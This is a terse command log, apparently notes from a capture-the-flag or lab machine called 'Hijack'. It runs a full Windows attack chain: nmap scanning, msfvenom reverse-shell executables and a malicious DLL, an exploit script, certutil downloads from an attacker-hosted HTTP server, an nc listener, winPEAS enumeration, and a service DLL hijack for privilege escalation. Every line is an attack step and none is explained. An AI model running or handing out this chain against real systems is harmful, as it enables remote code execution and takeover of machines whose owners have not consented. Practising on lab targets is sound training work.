Hijack

nmap -A -p- -oA output 172.31.1.27 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -p- -sS —min-rate=5000 —open -vvv -n -Pn 172.31.1.27 -oG allPorts

extractPorts allPorts

nmap -sC -sV -p80,135,139,445,3389,5985,47001 172.31.1.27 -oN targeted

nmap —script http-enum -p80 172.31.1.27 -oN webScan

whatweb 172.31.1.27:80

cat targeted

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o reverse_hijack.exe

ruby 44449.rb 172.31.1.27

python3 -m http.server 8888

certutil.exe -urlcache -split -f “http://10.10.0.12:8888/reverse_hijack.exe” reverse_hijack.exe

nc -lvnp 4444

cd C:\Users\jack\Desktop\

file access.txt

certutil.exe -urlcache -split -f http://10.10.0.12:8888/winPEASany.exe winPEASany.exe

cd C:\Program Files\Hijack\Libraries

sc query Hijack

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.12 LPORT=5555 -f dll -o Custom.dll

cd Program Files\Hijack\Libraries

certutil.exe -urlcache -f http://10.10.0.12:8888/Custom.dll Custom.dll

sc start Hijack